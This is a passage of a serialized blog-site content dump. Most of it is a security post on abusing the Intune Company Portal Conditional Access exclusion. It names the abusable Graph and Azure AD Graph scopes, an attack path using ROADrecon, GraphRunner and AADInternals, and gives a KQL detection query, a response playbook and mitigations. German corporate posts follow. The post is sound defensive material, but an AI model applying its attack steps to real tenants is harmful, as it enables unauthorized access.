a closer look at the criticality of the shown delegated permission scope and potential authorization to call sensitive APIs?",[2548,12351,12353],{"id":12352},"which-privileges-and-delegated-scope-are-critical","Which privileges and delegated scope are critical?",[353,12355,9352],{},[629,12357,12359],{"id":12358},"azure-ad-graph-api","Azure AD Graph API",[353,12361,10713],{},[353,12363,12364,12365,12370,12371,12376],{},"The legacy programmatic interface offers many APIs to manage directory settings and objects in Entra ID (Azure AD). This includes Conditional Access policies, directory roles, CRUD on groups and devices and operations on the signed-in user, such as change password. A full list of all supported operations can be found in the ",[374,12366,12369],{"href":12367,"rel":12368},"https://learn.microsoft.com/en-us/previous-versions/azure/ad/graph/api/api-catalog",[378],"Azure AD Graph API reference",". This API will be fully retired on June 30, 2025 (based on ",[374,12372,12375],{"href":12373,"rel":12374},"https://learn.microsoft.com/en-us/graph/migrate-azure-ad-graph-overview",[378],"Microsoft latest announcements",").",[353,12378,12379,12380,12383],{},"The assigned delegated scope “user_impersonation” allows the application (in this case, Company Portal) to act on behalf of the user. So, every permission that the signed-in user has to an Entra object, scope or directory-level can be used as authorization in the API calls. The user might be the owner of an Entra ID object (application, group, or other objects), or they might be assigned permissions through Entra ID role assignments. ",[433,12381,12382],{},"In the case of active high privileged role assignments, this would allow the attacker to modify objects or compromise the tenant",". At least, even without any privileges, default user permissions can be used for extensive reconnaissance and enumeration of directory objects in the tenant.",[353,12385,12386],{},"Therefore, the scenarios and impact to abuse the Azure AD Graph API depends on the active or permanent assigned privileges of the affected user. APIs to access Microsoft 365 services (e.g., for exfiltration of OneDrive) are not included in Azure AD Graph.",[629,12388,12316],{"id":12389},"microsoft-graph-api",[353,12391,10713],{},[353,12393,12394],{},"In comparison to Azure AD Graph, the delegated scope to Microsoft Graph API is restricted to a certain scope. Alongside OpenID scopes (openid, email, profile) and basic read operations on behalf of the user (ServicePrincipalEndpoint.Read.All, User.Read).",[353,12396,12397],{},"List and read of all device objects can be achieved by calling “device” endpoint in Microsoft Graph with default permissions by using “Device.Read.All\". This could help attackers to gain insights of device objects.",[353,12399,12400],{},"In case of a compromised user with assignment to “Intune Administrator” or any delegation in Microsoft Intune RBAC, the following granted delegated API permission should be considered problematic:",[367,12402,12403,12406],{},[370,12404,12405],{},"”DeviceManagementConfiguration.Read.All”",[370,12407,12408],{},"“DeviceManagementConfiguration.ReadWrite.All”",[353,12410,12411],{},[433,12412,12413,12414,12419],{},"Those delegated permissions allow CRUD operations, for example on Device Compliance and Configuration Policies but also deployment of ",[374,12415,12418],{"href":12416,"rel":12417},"https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta",[378],"Management Scripts"," for further malicious activity on target devices.",[629,12421,12327],{"id":12422},"device-registration-service",[353,12424,10713],{},[353,12426,12427],{},"With this permission the attacker is able to join or register a device to Entra ID. In turn this would allow them to even enroll the device in Intune and depending on the Intune configuration get a valid and compliant to device to access even more protected services.",[629,12429,12431],{"id":12430},"other-foci-applications","Other FOCI applications",[353,12433,10713],{},[353,12435,12436],{},"Requesting access to other privileged interfaces, for example Azure Resource Manager API is in scope of FOCI and interests of the attacker well. However, this resource is still protected and not bypassed to the Conditional access grant control “compliant device”.",[353,12438,12439],{},[356,12440],{"alt":12245,"src":12441},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-03.png",[2548,12443,12445],{"id":12444},"can-we-detect-this-attack-technique","Can we detect this attack technique?",[353,12447,9352],{},[353,12449,12450],{},"As described above, the greatest risk comes from access to MS Graph and Azure AD Graph.",[353,12452,12453],{},"Since the application ID of the Microsoft Intune Company Portal App is always used in this case, the main task for creating a detection is to exclude legitimate use by e.g. device registrations, which according to our observation consists of which resources are accessed first in a session → in case of an attack usually MS Graph or Azure AD Graph.",[353,12455,12456],{},"Here is a working detection that we tested in several environments different sizes:",[2559,12458,12459,12460,8117,12462,8122,12464,12466,12469,1501,12471,12473,1501,12477,8117,12479,12481,12482,1501,12485,12487,1501,12490,8117,12492,12494,12495,12497,1501,12500,8117,12502,12504,12505,12508,12509,2454,12512,12515,12516,8117,12518,12520,12521,12523,1501,12526,8117,12528,12508,12531,12533,12534,12536,12537,12539,12540,1501,12542,12536,12544,12547,12548,12551,12552,12554,12555,12520,12558,12560,1501,12563,8117,12565,12567,12568,8117,12570,12572,12573,1501,12575,12577,1501,12579,8117,12581,12481,12583,1501,12585,12587,1501,12590,8117,12592,12504,12594,12508,12596,2454,12598,12515,12600],{"style":8113},"\nAADSignInEventsBeta ",[2970,12461],{},[7258,12463,8121],{"style":8120},[7258,12465,8126],{"style":8125},[7258,12467,12468],{"style":8129},"7d",[7258,12470,8133],{"style":8125},[2970,12472],{},[7258,12474,12476],{"style":12475},"color: #75715E;","// Access to Microsoft Intune Company Portal",[2970,12478],{},[7258,12480,8121],{"style":8120}," ApplicationId == ",[7258,12483,12484],{"style":8141},"@\"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\"",[2970,12486],{},[7258,12488,12489],{"style":12475},"// From non joined/registered device",[2970,12491],{},[7258,12493,8121],{"style":8120}," isempty(AadDeviceId) ",[2970,12496],{},[7258,12498,12499],{"style":12475},"// Used to access resource Microsoft Graph or Windows Azure Active Directory",[2970,12501],{},[7258,12503,8121],{"style":8120}," ResourceId ",[7258,12506,12507],{"style":8120},"in"," (",[7258,12510,12511],{"style":8141},"\"00000002-0000-0000-c000-000000000000\"",[7258,12513,12514],{"style":8141},"\"00000003-0000-0000-c000-000000000000\"",") ",[2970,12517],{},[7258,12519,8269],{"style":8120}," SessionId ",[2970,12522],{},[7258,12524,12525],{"style":12475},"// Find the initial logon event based on the session Id",[2970,12527],{},[7258,12529,12530],{"style":8120},"join kind=inner",[2970,12532],{},"\n    AADSignInEventsBeta ",[2970,12535],{},"\n    | ",[7258,12538,8121],{"style":8120}," ErrorCode == ",[7258,12541,2832],{"style":8129},[2970,12543],{},[7258,12545,12546],{"style":8120},"summarize arg_min(","Timestamp, *",[7258,12549,12550],{"style":8120},") by"," SessionId)",[2970,12553],{},"\n    ",[7258,12556,12557],{"style":8120},"on",[2970,12559],{},[7258,12561,12562],{"style":12475},"// Ignore trusted and managed devices",[2970,12564],{},[7258,12566,8121],{"style":8120}," isempty(DeviceTrustType) ",[2970,12569],{},[7258,12571,8121],{"style":8120}," IsManaged != ",[7258,12574,1849],{"style":8129},[2970,12576],{},[7258,12578,12476],{"style":12475},[2970,12580],{},[7258,12582,8121],{"style":8120},[7258,12584,12484],{"style":8141},[2970,12586],{},[7258,12588,12589],{"style":12475},"// when the first requested resource is Microsoft Graph or Windows Azure Active Directory",[2970,12591],{},[7258,12593,8121],{"style":8120},[7258,12595,12507],{"style":8120},[7258,12597,12511],{"style":8141},[7258,12599,12514],{"style":8141},[2970,12601],{},[2548,12603,12605],{"id":12604},"how-should-we-respond-when-we-detect-suspicious-activities","How should we respond when we detect suspicious activities?",[353,12607,9352],{},[353,12609,12610],{},"Initialize your incident response process using a defined playbook which contains:",[367,12612,12613,12633,12641,12644,12647],{},[370,12614,12615,12616],{},"Hunting for suspicious or anomalous activity by the compromised user\n",[367,12617,12618,12624,12627,12630],{},[370,12619,12620,12621],{},"Summary of non-interactive sign-in to Resource Applications including IP addresses and UserAgents based on ",[3724,12622,12623],{},"sessionId",[370,12625,12626],{},"Check if Microsoft Entra Audit Logs shown critical operations by the user or IP addresses (e.g., added credentials to owned app registrations)",[370,12628,12629],{},"Identify if the user has registered devices in the affected session",[370,12631,12632],{},"Check Intune audit logs for operations by application “Company Portal” and the affected user",[370,12634,12635,12636],{},"Hunting for related alerts by the impacted entities\n",[367,12637,12638],{},[370,12639,12640],{},"Lookup for entities in the AlertEvidence table to identify other alerts based on SessionId, IP Addresses and User",[370,12642,12643],{},"Identify criticality of the user (by privileges) in Exposure Management",[370,12645,12646],{},"Review of hunting results and verify if the action was legitimate as part of a device enrollment.",[370,12648,12649],{},"Identity the initial access vector and reset the users’ credentials and when needed devices.",[2548,12651,12653],{"id":12652},"can-we-mitigate-the-attack","Can we mitigate the attack?",[353,12655,9352],{},[353,12657,12658,12659,12662],{},"Since the configured exclusion is required for Intune enrollment, ",[433,12660,12661],{},"there is no mitigation that would not break other parts of Microsoft 365",". Access to the Azure AD Graph resource cannot be scoped or blocked directly. Any Conditional Access policy using “Block” as grant control will prevent access but might have other implications.",[353,12664,12665],{},"But for mitigation it is crucial to understand that this Conditional Access bypass is not a complete attack. It is a technique which as a step allows a range of attacks.",[353,12667,12668],{},"An attack path could be",[5026,12670,12671,12674,12677,12680],{},[370,12672,12673],{},"Account Compromise via Phishing and AiTM",[370,12675,12676],{},"Conditional Access Bypass",[370,12678,12679],{},"Reconnaissance using e.g. ROADrecon, GraphRunner or AADInternals",[370,12681,12682],{},"Lateral Movement, Privilege Escalation or Persistence through a newly registered device enrolled in Intune",[353,12684,12685],{},"Since we are not able to mitigate the Conditional Access bypass without breaking Intune enrollment, it is more than reasonable to implement mitigations at the other steps off the attack path and also implement reasonable detections.",[353,12687,12688],{},"To reduce the probability and impact we suggest increasing the strengths of other controls and implement the following soon:",[367,12690,12691,12697,12703,12709,12715,12730,12736],{},[370,12692,12693,12696],{},[433,12694,12695],{},"Enforce MFA for “All Users” and “All Cloud Apps” through Conditional Access."," If you only enforce Device Compliance Single Factor Authentication is enough with this technique.",[370,12698,12699,12702],{},[433,12700,12701],{},"Do not use Device Compliance or MFA in your rulesets, always enforce both!"," Using OR would never restrict all access to compliant device, because an access token with MFA in scope would be sufficient to access the tenant.",[370,12704,12705,12708],{},[433,12706,12707],{},"Restrict Security Information Registration to Compliant Devices, Phishing Resistant Authentication or TAP."," In our tests we did not manage to bypass Device Compliance for the Security Info Registration.",[370,12710,12711,12714],{},[433,12712,12713],{},"Require Phishing Resistant Authentication or TAP for Join or Register Devices"," Without it will be possible to register a device with e.g. AADInternals and this technique.",[370,12716,12717,12720,12721],{},[433,12718,12719],{},"Require MFA and “Sign-in frequency every time” for Microsoft Intune Enrollment"," This limits the timespan an attacker could use fresh credentials to enroll a new device to Intune.\n",[2179,12722,12723],{},[353,12724,12725,12726,12729],{},"🚧\n",[433,12727,12728],{},"Caution: Sign-in frequency every time = Every five minutes","\nMicrosoft factors for five minutes of clock skew when “every time” is selected in a conditional access policy, so that users do not get prompted more often than once every five minutes.",[370,12731,12732,12735],{},[433,12733,12734],{},"Block personally owned devices in the Intune Enrollment restrictions."," Without these restrictions, an attacker could enroll a new device and gain additional foothold.",[370,12737,12738,12741],{},[433,12739,12740],{},"Set device compliance to fail when no compliance policy is assigned to a device in Intune."," By default each device is considered compliant, even if no policy is actually applied. Change this and make a device compliance policy a requirement.",[353,12743,12744,12745,456],{},"In the long run, we would like to encourage you to invest in rollout password-less, phishing-resistant authentication like Windows Hello for Business and Passkeys (incl. Platform Credentials by using macOS Platform SSO). This will allow you to subsequently enforce phishing resistant authentication and block AiTM attacks. Instead of password allow the usage of Temporary Access Pass (TAP) for limited time and scenarios, e.g. onboarding new devices or employees. To support the usage of TAPs for various use cases we have built ",[374,12746,12749],{"href":12747,"rel":12748},"https://myworkid.cloud/",[378],"MyWorkID",[2548,12751,12753],{"id":12752},"conclusion","Conclusion",[353,12755,9352],{},[353,12757,12758],{},"Conditional Access as the Zero Trust engine for Entra ID is, in itself, already complicated. Added built-in exclusions in the backend of Entra by Microsoft make it even harder for many to understand the impact of policies and protections. Still the idea of Zero Trust and defense in depth holds up.",[353,12760,12761],{},"The device compliance policy prevents most AiTM attacks and multi-factor authentication makes it harder for any attacker to abuse leaked or otherwise compromised credentials.",[353,12763,12764],{},"All these security measures must be used together and not one instead of the other. This ensures a secure environment, even if one of the defenses is tampered with or overcome.",[353,12766,12767],{},"We strongly recommend deploying the provided detection in Microsoft Defender XDR to ensure detection of potential abuse. Make sure your SOC is prepared to investigate those incidents and provide them with the necessary playbooks.",{"title":402,"searchDepth":403,"depth":403,"links":12769},[12770,12771,12772,12775,12781,12782,12783,12784],{"id":12169,"depth":403,"text":12170},{"id":12225,"depth":403,"text":12226},{"id":12269,"depth":403,"text":12270,"children":12773},[12774],{"id":12275,"depth":704,"text":12276},{"id":12352,"depth":403,"text":12353,"children":12776},[12777,12778,12779,12780],{"id":12358,"depth":704,"text":12359},{"id":12389,"depth":704,"text":12316},{"id":12422,"depth":704,"text":12327},{"id":12430,"depth":704,"text":12431},{"id":12444,"depth":403,"text":12445},{"id":12604,"depth":403,"text":12605},{"id":12652,"depth":403,"text":12653},{"id":12752,"depth":403,"text":12753},{"seoTitle":12786,"titleClass":7896,"date":12787,"categories":12788,"blogtitlepic":12789,"socialimg":12790,"customExcerpt":12791,"keywords":12792,"contactInContent":12793,"scripts":12820},"Compliant Device Bypass in Microsoft Intune – Detection, Response & Mitigation","2025-01-14",[1117],"header-company-portal-ca-bypass","/blog/heads/header-company-portal-ca-bypass.png","In this blog post, glueckkanja's MVP Fabian Bader, Chris Brumm and Thomas Naunheim gather details about the Compliant Device Bypass in Microsoft Intune Company Portal. After additional research, they have found an approach to detect and respond to the potential threat. You'll also find guidance on Conditional Access to reduce the attack surface and details on the blast radius.","Compliant Device Bypass, Microsoft Intune, Conditional Access, Entra ID, Intune Company Portal, device compliance, CA exclusion, TokenSmith PoC, cloud security, PowerShell PoC, Fabian Bader, Christopher Brumm, Thomas Naunheim, security threat, Black Hat Europe, Intune Enrollment, MSRC response, attack detection, threat mitigation, cloud compliance, FOCI feature",{"quote":406,"infos":12794},{"bgColor":10589,"color":10128,"boxBgColor":10590,"boxColor":10126,"headline":10591,"subline":12795,"level":2548,"textStyling":9489,"flush":9490,"person":12796,"form":12801},"Would you like to learn more about the Compliant Device Bypass and how to detect and mitigate it effectively? Our experts are ready to walk you through our findings and support you with proven strategies for enhanced security. We look forward to connecting with you!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":12797,"details":12798},"We look forward to hearing from you!",[12799,12800],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":12802,"cta":12803,"method":407,"action":9511,"fields":12804},"Send",{"skin":9510},[12805,12807,12810,12813,12816,12818,12819],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":12806},"Please enter your name.",{"label":12808,"type":3722,"id":9519,"required":415,"requiredMsg":12809},"Company*","Please enter your company.",{"label":12811,"type":9523,"id":9523,"required":415,"requiredMsg":12812},"Email address*","Please enter your email address.",{"label":12814,"type":9527,"id":9528,"required":415,"requiredMsg":12815},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","Please confirm",{"type":9531,"id":9532,"value":12817},"Request Global Secure Access",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"slick":415,"form":415},"/posts/2025-01-14-compliant-device-bypass",{"title":12163,"description":402},"posts/2025-01-14-compliant-device-bypass",[1117,12825,3295,12826,10483],"Entra","ITDR","k2qQKt0NbAhqxOymC0gTNk9FJ0v1I8110cL3thn58fQ",{"id":12829,"title":12830,"author":12831,"body":12832,"cta":3,"description":12898,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":12899,"moment":12901,"navigation":415,"path":12918,"seo":12919,"stem":12920,"tags":12921,"webcast":406,"__hash__":12922},"content_de/posts/2025-03-04-mssp-2025.md","'23, '24, '25 – das Triple ist komplett!",[191],{"type":350,"value":12833,"toc":12893},[12834,12840,12844,12846,12853,12855,12859,12861,12864,12867,12878,12881,12885,12887,12890],[353,12835,12836,12839],{},[433,12837,12838],{},"Nach 2023 und 2024 setzt sich unser Erfolgskurs fort: glueckkanja gehört auch 2025 zu den Spitzenreitern der Microsoft Security Excellence Awards."," Als führender Managed Security Service Provider (MSSP) zählen wir erneut zu den Top-Partnern, die Microsoft für herausragende Leistungen im Bereich Cybersecurity auszeichnet. Drei aufeinanderfolgende Jahre in dieser Liga – das spricht für sich.",[2548,12841,12843],{"id":12842},"eine-der-begehrtesten-auszeichnungen-der-branche","Eine der begehrtesten Auszeichnungen der Branche",[353,12845,9352],{},[353,12847,12848,12849,12852],{},"Die Microsoft Security Excellence Awards gehören zu den renommiertesten Auszeichnungen der IT-Sicherheitsbranche. Jährlich ehrt Microsoft Partner, die neue Maßstäbe in der Abwehr von Cyber-Bedrohungen setzen. Auch 2025 gehört glueckkanja zu den ",[433,12850,12851],{},"Spitzenreitern in der Kategorie \"Security MSSP of the Year\""," – einer Auszeichnung, die ausschließlich an die besten Managed Security Service Provider vergeben wird.",[9300,12854],{":quotes":9300,":no-fullscreen":7391},[2548,12856,12858],{"id":12857},"drei-jahre-in-folge-ausgezeichnet-und-das-ist-erst-der-anfang","Drei Jahre in Folge ausgezeichnet – und das ist erst der Anfang",[353,12860,9352],{},[353,12862,12863],{},"Unsere erneute Auszeichnung als führender MSSP ist das Ergebnis unseres konsequenten Fokus auf innovative Sicherheitslösungen und exzellenten Service. glueckkanja kombiniert modernste Microsoft-Security-Technologien mit tiefgehender Expertise und einem klaren Ziel: Unternehmen in einer zunehmend bedrohlichen Cyberwelt optimal abzusichern. Und das direkte Kundenfeedback spricht für sich:",[353,12865,12866],{},"Unsere CSOC Customer Poll zeigt die herausragende Qualität unserer Services:",[367,12868,12869,12872,12875],{},[370,12870,12871],{},"87 % bewerten unsere technische Expertise auf höchstem Niveau",[370,12873,12874],{},"94 % loben unsere 24/7-Abdeckung",[370,12876,12877],{},"100 % sind mit der Gesamterfahrung zufrieden",[353,12879,12880],{},"Ein großes Dankeschön an Microsoft und MISA für ihr Vertrauen, die wertvolle Partnerschaft und die kontinuierliche Unterstützung. Diese Community aus führenden Security-Experten ist mehr als ein Netzwerk – sie ist ein Ökosystem, das gemeinsam Maßstäbe setzt. Ein besonderer Dank gilt auch allen MISA-Partnern: Eure Innovationen und euer Engagement treiben uns alle voran. Gemeinsam machen wir die digitale Welt sicherer.",[2548,12882,12884],{"id":12883},"_23-24-25-wir-setzen-den-standard-in-microsoft-security","'23, '24, '25 – Wir setzen den Standard in Microsoft Security",[353,12886,9352],{},[353,12888,12889],{},"Drei Jahre in Folge ausgezeichnet – das ist mehr als ein Erfolg, es ist ein klares Zeichen für Exzellenz. glueckkanja bleibt an der Spitze der Microsoft Sicherheitslandschaft und wird auch in Zukunft mit innovativen Lösungen und herausragender Servicequalität Maßstäbe setzen.",[353,12891,12892],{},"Wir freuen uns auf die weitere Zusammenarbeit mit Microsoft, unseren Kunden und Partnern – und auf das nächste Kapitel in unserer Erfolgsgeschichte.",{"title":402,"searchDepth":403,"depth":403,"links":12894},[12895,12896,12897],{"id":12842,"depth":403,"text":12843},{"id":12857,"depth":403,"text":12858},{"id":12883,"depth":403,"text":12884},"Nach 2023 und 2024 setzt sich unser Erfolgskurs fort: glueckkanja gehört auch 2025 zu den Spitzenreitern der Microsoft Security Excellence Awards. Als führender Managed Security Service Provider (MSSP) zählen wir erneut zu den Top-Partnern, die Microsoft für herausragende Leistungen im Bereich Cybersecurity auszeichnet. Drei aufeinanderfolgende Jahre in dieser Liga – das spricht für sich.",{"seoTitle":12900,"titleClass":7896,"date":12901,"categories":12902,"blogtitlepic":12903,"socialimg":12904,"customExcerpt":12905,"keywords":12906,"hreflang":12907,"quotes":12912},"Microsoft Security Excellence Awards: glueckkanja erneut Finalist als Security MSSP des Jahres 2025","2025-03-04",[410],"head-mssp-finalist-2025","/socialimg/og-img-mssp-2025.png","glueckkanja ist erneut Finalist bei den Security MSSP of the Year Awards und damit wieder unter den weltweit führenden Managed Microsoft Security Anbietern, die im April auf der RSA Conference in San Francisco gefeiert werden. Drei Jahre in Folge gehört unser Unternehmen zu den besten Partnern im Bereich Cybersecurity – eine Erfolgsgeschichte, die ihresgleichen sucht.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Bester Microsoft Security Partner 2025, Microsoft MSSP Finalist 2025, Microsoft Security Award Gewinner, Cybersecurity Anbieter mit Microsoft-Technologie, Managed Security für Microsoft 365, Microsoft Intelligent Security Association (MISA) Partner, RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, MISA Partner Microsoft, Microsoft Sicherheitslösungen für Unternehmen, Cybersecurity Trends 2025",[12908,12910],{"lang":2118,"href":12909},"/blog/corporate/2025/03/mssp-2025-en",{"lang":9114,"href":12911},"/blog/corporate/2025/03/mssp-2025-es",{"items":12913},[12914],{"text":12915,"name":12916,"company":12917,"alt":12916},"I'm very pleased to extend my warmest congratulations to this year's finalists for the Microsoft Security Excellence Awards. These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It's my pleasure to acknowledge and celebrate their work over the past year.","Maria Thomson","Director, Microsoft Intelligent Security Association","/posts/2025-03-04-mssp-2025",{"title":12830,"description":12898},"posts/2025-03-04-mssp-2025",[3933,422,1117,9332],"w3sTYMrEH9K8SwKVZM13--gOSmVW42V4sP-MaJ1eU-8",{"id":12924,"title":12925,"author":12926,"body":12927,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":13003,"moment":13005,"navigation":415,"path":13050,"seo":13051,"stem":13052,"tags":13053,"webcast":406,"__hash__":13057},"content_de/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[265],{"type":350,"value":12928,"toc":12999},[12929,12933,12935,12938,12964,12967,12971,12973,12976,12996],[2548,12930,12932],{"id":12931},"eine-cloud-region-die-alles-verändert","Eine Cloud-Region, die alles verändert!",[353,12934,9352],{},[353,12936,12937],{},"Jetzt gibt es eine Antwort auf all diese Challenges: Microsoft errichtet eine eigene Cloud-Region in Österreich mit hochmodernen Rechenzentren und maximaler Performance. Das bedeutet für dich: Du bekommst jetzt die globale Power einer Public Cloud mit der Sicherheit lokaler Datenspeicherung!",[367,12939,12940,12946,12952,12958],{},[370,12941,12942,12945],{},[433,12943,12944],{},"Maximale Performance:"," geringere Latenzzeiten, höhere Skalierbarkeit, mehr Effizienz",[370,12947,12948,12951],{},[433,12949,12950],{},"Lokale Datenspeicherung:"," alle Daten bleiben in Österreich – sicher, konform und geschützt",[370,12953,12954,12957],{},[433,12955,12956],{},"Erhöhte Sicherheit & Resilienz:"," modernste Infrastruktur mit mehrfacher Absicherung",[370,12959,12960,12963],{},[433,12961,12962],{},"Nachhaltige IT:"," bis zu 93 % energieeffizienter als traditionelle Rechenzentren",[353,12965,12966],{},"Doch eine Cloud-Region allein reicht nicht – erst der richtige Partner macht den Unterschied. Hier kommen wir von glueckkanja ins Spiel.",[2548,12968,12970],{"id":12969},"wir-machen-dich-bereit-für-die-lokale-zukunft-deiner-it","Wir machen dich bereit für die lokale Zukunft deiner IT!",[353,12972,9352],{},[353,12974,12975],{},"In Deutschland gehören wir zu den führenden Microsoft-Partnern für Cloud-Migration. Jetzt gibt es unser Know-how auch in der neuen Microsoft Cloud Region Österreich. Als strategischer Partner bringen wir dein Unternehmen jetzt reibungslos in die Cloud. Du hast Fragen zum Datenschutz, zur Migration von Systemen oder zu nutzbaren finanziellen Vorteilen? Wir sind für dich da und begleiten dich von den ersten Steps bis zum finalen Go-live (und gerne auch darüber hinaus). Deine Vorteile:",[367,12977,12978,12984,12990],{},[370,12979,12980,12983],{},[433,12981,12982],{},"Blueprint & Landing Zone Deployment:"," Wir ermöglichen dir eine sichere, schnelle und reibungslose Migration!",[370,12985,12986,12989],{},[433,12987,12988],{},"AMM Funding:"," Wir informieren dich umfassend über Microsoft-Förderungen für eine kosteneffiziente Umstellung!",[370,12991,12992,12995],{},[433,12993,12994],{},"Nahtloser Umzug:"," Wir begleiten dich mit standardisierten Lösungen Schritt für Schritt in die neue Ö-Cloud!",[353,12997,12998],{},"Profitiere jetzt von unserer Erfahrung aus über 100 erfolgreichen Cloud-Migrationen und unserer erstklassigen Microsoft-Expertise.",{"title":402,"searchDepth":403,"depth":403,"links":13000},[13001,13002],{"id":12931,"depth":403,"text":12932},{"id":12969,"depth":403,"text":12970},{"seoTitle":13004,"titleClass":7896,"date":13005,"categories":13006,"blogtitlepic":13007,"socialimg":13008,"customExcerpt":13009,"keywords":13010,"contactInContent":13011,"hreflang":13044,"scripts":13049,"published":415},"Microsoft Cloud Region Österreich: Lokale Cloud-Power für dein Unternehmen","2025-03-12",[1773],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Aktuell stehen Österreichs Unternehmen an einem Wendepunkt. Die Digitalisierung nimmt immer rasanter Fahrt auf. Gleichzeitig steigen mit ihr die Anforderungen an IT-Sicherheit, Geschwindigkeit und Flexibilität – und auch die Herausforderungen in Bezug auf Kosten, regulatorische Hürden und den Einsatz neuer Technologien wachsen.","Microsoft Cloud Region Österreich, Cloud Migration Österreich, lokale Datenspeicherung, Cloud Sicherheit, Microsoft Partner Österreich, Cloud-Performance, nachhaltige IT, Cloud Lösungen Österreich, Azure Migration, Landing Zone Deployment",{"quote":415,"infos":13012},{"bgColor":12128,"headline":13013,"subline":13014,"level":2548,"textStyling":9489,"flush":9490,"person":13015,"form":13022},"Jetzt Kontakt aufnehmen!","Möchtest du mehr darüber erfahren, wie wir dein Unternehmen reibungslos und sicher in die neue Microsoft Cloud Region Österreich bringen? Wir stellen dir unser Angebot gerne persönlich vor, klären deine Fragen zu Datenschutz und Migration und begleiten dich Schritt für Schritt bei deinem Weg in die Cloud. Sichere dir jetzt dein persönliches Beratungsgespräch!",{"image":13016,"cloudinary":415,"alt":265,"name":265,"quotee":265,"quoteeTitle":13017,"quote":13018,"detailsHeader":10135,"details":13019},"/people/people-florian-stoeckl.jpg","Azure Lead","Die neue Microsoft Cloud Region Österreich ist ein echter Gamechanger: Lokale Datenspeicherung kombiniert mit globaler Cloud-Power – eine unschlagbare Mischung für Sicherheit, Performance und Innovation. Mit unserer langjährigen Expertise sorgen wir dafür, dass österreichische Unternehmen diese Chance jetzt optimal nutzen können.",[13020,13021],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":13023,"method":407,"action":9511,"fields":13024},{"skin":9510},[13025,13026,13027,13028,13033,13035,13037,13040,13042,13043],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":13029,"type":13030,"id":13031,"required":415,"requiredMsg":13032},"Deine Nachricht an uns*","textarea","message","Bitte gib eine Nachricht ein.",{"label":13034,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Deine Daten werden zur Bearbeitung und Beantwortung deiner Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz findest du in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":9531,"id":13036,"value":1773},"_topic",{"type":9531,"id":13038,"value":13039},"_location","AT",{"type":9531,"id":9532,"value":13041},"Form: Blog Hello Clöud | DE",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[13045,13047],{"lang":2118,"href":13046},"/blog/azure/2025/03/azure-goes-austria-en",{"lang":9114,"href":13048},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":415},"/posts/2025-03-12-azure-goes-austria",{"title":12925,"description":402},"posts/2025-03-12-azure-goes-austria",[1773,13054,13055,13056],"Cloud Migration","IT Infrastructure","Austria","W8LD1Nq0tgtlDUQ6I3EkjXpGkjLgQBRiquTyPPH1sxo",{"id":13059,"title":13060,"author":13061,"body":13062,"cta":3,"description":13066,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":13241,"moment":13243,"navigation":415,"path":13270,"seo":13271,"stem":13272,"tags":13273,"webcast":406,"__hash__":13275},"content_de/posts/2025-04-07-bcdr-management.md","Wenn Systeme ausfallen, zeigt sich, wie gut dein Plan wirklich ist",[265],{"type":350,"value":13063,"toc":13232},[13064,13067,13073,13077,13079,13082,13085,13089,13091,13102,13105,13110,13114,13116,13119,13123,13125,13130,13138,13143,13151,13156,13164,13169,13177,13182,13190,13194,13196,13199,13204,13215,13219,13221,13224,13227],[353,13065,13066],{},"Moderne IT-Infrastrukturen sind verteilt, dynamisch und eng mit dem Geschäftserfolg verknüpft. Ausfälle einzelner Dienste oder ganzer Plattformen können schnell zu einem kritischen Risiko für Unternehmen werden – operativ wie reputativ.",[353,13068,13069,13072],{},[433,13070,13071],{},"Business Continuity und Disaster Recovery (BCDR)"," sind heute kein optionales IT-Thema mehr, sondern eine unternehmerische Pflicht – sowohl aus regulatorischer Sicht als auch mit Blick auf Cyberresilienz und operative Stabilität.",[2548,13074,13076],{"id":13075},"komplexität-wächst-resilienz-oft-nicht","Komplexität wächst – Resilienz oft nicht",[353,13078,9352],{},[353,13080,13081],{},"Cloud-native Architekturen, hybride Szenarien, Self-Service-Initiativen aus Fachbereichen: Die IT-Landschaft wird zunehmend heterogener. In vielen Fällen fehlt jedoch eine übergreifende Struktur für Ausfallsicherheit.",[353,13083,13084],{},"Einzelne Applikationen entstehen schnell – häufig ohne konsistente Backup-, Recovery- oder Failover-Konzepte. Und genau hier entsteht eine gefährliche Lücke: Zwischen dem, was technisch möglich wäre, und dem, was tatsächlich umgesetzt wurde.",[2548,13086,13088],{"id":13087},"regulatorische-anforderungen-nis2-und-dora-setzen-neue-maßstäbe","Regulatorische Anforderungen: NIS2 und DORA setzen neue Maßstäbe",[353,13090,9352],{},[353,13092,13093,13094,13097,13098,13101],{},"Mit der ",[433,13095,13096],{},"NIS2-Richtlinie (EU)"," und der ",[433,13099,13100],{},"DORA-Verordnung"," (für den Finanzsektor) 